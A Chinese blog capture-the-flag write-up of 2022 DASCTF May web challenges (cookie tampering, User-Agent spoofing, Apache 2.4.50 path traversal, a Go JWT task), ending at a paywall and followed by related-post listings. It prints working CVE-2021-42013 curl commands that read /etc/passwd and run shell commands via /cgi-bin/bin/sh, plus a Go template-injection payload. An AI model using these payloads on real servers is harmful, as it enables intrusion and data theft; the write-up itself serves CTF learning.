2022DASCTF MAY 出题人挑战赛

最新推荐文章于 2024-04-18 16:56:19 发布
原创 最新推荐文章于 2024-04-18 16:56:19 发布 · 962 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#CTF #Web

本文详细解析了DASCTF五月挑战赛中的多个题目,包括利用PowerCookie获取管理员权限、通过修改User-Agent实现魔法浏览器功能、利用路径穿越漏洞获取敏感信息等。

2022DASCTF MAY 出题人挑战赛

文章目录

Power Cookie

发包,查看回显

在cookie加一个

admin=1

在这里插入图片描述

得到flag

DASCTF{
   
   ad2e3900-06dd-4b04-9cec-1a8878a3777f}

魔法浏览器

f12查看
在这里插入图片描述

然后修改报文

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Magic/100.0.4896.75

在这里插入图片描述

DASCTF{
   
   d6213d8a-3060-4f5b-9fb6-6e2bda77a6d6}

getme

根据返回包:

Apache/2.4.50 (Unix)

找到一个这个版本的路径穿越的CVE

(1条消息) Apache HTTP Server 2.4.50 中的路径遍历和文件泄露漏洞 (CVE-2021-42013)_RichardLg的博客-优快云博客_apache目录遍历漏洞修复

用CVE打

GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/flag

在这里插入图片描述

查看任意文件

curl -v --path-as-is http://node4.buuoj.cn:25954/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

在这里插入图片描述
还能执行任意命令

curl -v --data "echo;id" 'http://node4.buuoj.cn:25954/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

在这里插入图片描述

查看日志,发现有一个/icons/.%%32%65/logs/access_log的记录

在这里插入图片描述

我们访问,发现flag的相关信息
在这里插入图片描述
访问

/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/diajgk/djflgak/qweqr/eigopl/fffffflalllallalagggggggggg

在这里插入图片描述

fxxgo

审计一下源码

  1. 会从环境变量中获取secret_key,flag,admin_id,admin_pw,并且将admin_id和admin_pw作为初始的变量,传入acc中
  2. get_account是根据id,找到对应的account变量,clear_account是清楚生成的变量,只留下第一个admin,这个也是唯一一个is_admin为true的
  3. jwt_encode和jwt_decode应该是根据已有的库生成
最低0.47元/天 解锁文章
linectf2022 online-library_[LineCTF2022]gotm
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-05 1026
linectf2022 online-library_[LineCTF2022]gotm linectf2022 online-library源码,分析一下几个路由和对应的请求处理函数, [LineCTF2022]gotm注册功能:func regist_handler(w http.ResponseWriter, r *http.Request) { uid := r.FormValue("id") upw := r.FormValue("pw") if uid == "" ||
2022 lineCTF WEB复现WriteUp
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-06 936
lineCTF WEB复现WriteUp Gotm, is_admin == true就给flag,需要伪造token,需要秘钥才行 再往下看,经典SSTI 如果能控制acc也就是id为{{.}},就能得到这三个的值,然后id可控,直接打就行了 接下来思路就很简单了,先注册一个id为{{.}}的用户: is_admin == true就给flag,需要伪造token,需要秘钥才行 再往下看,经典SSTI, 如果能控制acc也就是id为{{.}},就能得到这三个的值,然后id可控,直接打就行了 接下来思路就很
[LineCTF2022]gotm ( golang SSTI + JWT伪造 )
ShenZ的博客
04-15 5817
我们的思路是利用ssti得到secret_key,再伪造jwt即可得到flag。 如果是正常思路我们应该{{.secret_key}}注入得到key字段,但是root_handler函数中得到的acc是数组中的地址,也就是get_account函数通过在全局变量acc数组中查找我们的用户,这种情况下直接注入{{.secret_key}}会返回空 我们的payload应该是{{.}},可以得到 Account结构的所有字段 /regist?id={{.}}&pw=123 /auth?id={{.}}&
2022DASCTF MAY 出题挑战赛Writeup
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
05-22 1531
文章目录WEBPower Cookie魔法浏览器getmehackmefxxkgoMISC不懂PCB的厨师不是好黑客卡比神必流量 感觉这次难度还比较友好,一个肝到第18,不过全是web和misc,密码再给点时间感觉也能出。 WEB Power Cookie 以游客身份登录,发现服务器返回了set-cookie 将set-cookie返回的值上送,并修改成管理员即可 Cookie: admin=1; Path=/; Domain=127.0.0.1; Max-Age=3600 魔法浏览器 查看源代码,
DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现
FUCKING12的博客
10-06 2059
DASCTF X CBCTF 2022九月挑战赛(pwn方向)复现
2022DASCTF MAY 出题挑战赛 Writeup
末初 · mochu7
05-23 1426
2022DASCTF MAY 出题挑战赛 Writeup
2022DASCTF MAY 出题挑战赛web部分
m0_62422842的博客
05-23 643
前言 这是五月份buu的比赛,当时专心备考,所以没有怎么看,这次就来复现一下比赛中的一些web题吧。 Power Cookie 题目中提到了cookie,那肯定与cookie有关。题目中的信息没有给太多,那就bp抓包看看吧。 抓包分析看出set-cookie中admin为0 什么是set-Cookie?它向客户端发送一个http的cookie。cookie是由服务器发送给游览器的变量。上面是admin=0,我们需要管理员登录则就要admin=1。那这题就明显了。直接改包添加cookie就行了呀
Web2022DASCTF MAY 出题挑战赛 题解(全)
uuzeray的博客
04-18 1587
注册时传入{{.}}获取当前对象信息,就可获取jwt的secretkey,再令is_admin为true伪造jwt即可获得flag即可。sys_auth函数默认$type为0是加密,传入$type为1是解密。那只要用$type=0默认值,反过来加密我们欲下载恶意文件的url即可。/flag路由下只要is_admin为true就可以读flag。默认的$key为常量Mc_Encryption_Key。弱口令admin/123456/123456登录。带着伪造的jwt访问/flag拿到flag。
2022DASCTF MAY Power cookie
a1563361185的博客
05-22 515
进入题目场景 如图所示 点击login by guest 得到如图所示 显示游客不可用,再由题目的给出的提示可以知道,只有管理员有资格访问 按F12进入控制台,输入document.cookie查看cookie,得到 (这里本来应当是空格,但我自己写过了所以只改回了0,效果一样的) 输入document.cookie="admin=1".得到管理员 接着刷新界面 得到flag ...
2022DASCTF MAY 出题挑战赛 web复现
errorr0
05-23 1237
DASCTF
2022DASCTF MAY 出题挑战赛 misc
mumuzi的博客
05-22 3207
MAYMISC
2022DASCTF MAY 出题挑战赛writeup
weixin_43610673的博客
05-22 695
2022DASCTF MAY 出题挑战赛 WEB Power Cookie 1.抓包 2.添加Cookie 魔法浏览器 运行页面源代码的js得到User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Magic/100.0.4896.75 带着这个User-Agent访问即可 getme CVE-2021-42013 Apache HTTPd 2.4.49 2.4.50
2022DASCTF MAY web
weixin_63231007的博客
07-20 626
命令"'目标地址端口/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'curl-v--path-as-is目标地址端口/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd。所有需要我们上传一个users.go文件,然后其执行,我们访问users,会返回文件执行结果。......
CTF—Go题目复现
Sentiment的博客
06-23 3923
一道Go的模板注入由于没了解过Go的SSTI所以先简单看下:go语言快速入门:template模板 · Golang语言社区 · 看云 (kancloud.cn)Go SSTI初探 | tyskillのBloggo的SSTI漏洞成因与模板语法和jinja2差不多,都用到了,通过{{.}}我们可以获得到作用域Demo 当使用{{.}}时,会获取person结构体中的所有属性,所以在经过Execute渲染后,便会输出: 除此外若想获取单个属性也可以用 结果 复现 主要有几个路由 先看的flagHandler 中
[2022DASCTF MAY 出题挑战赛]神必流量 1
最新发布
07-27
2022DASCTF MAY出题挑战赛中,“神必流量”题目通常涉及对网络流量的分析,旨在考察参赛者对网络协议、数据包分析以及潜在隐写术的理解和应用能力。这类题目通常会提供一个或多个PCAP(Packet Capture)文件,...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值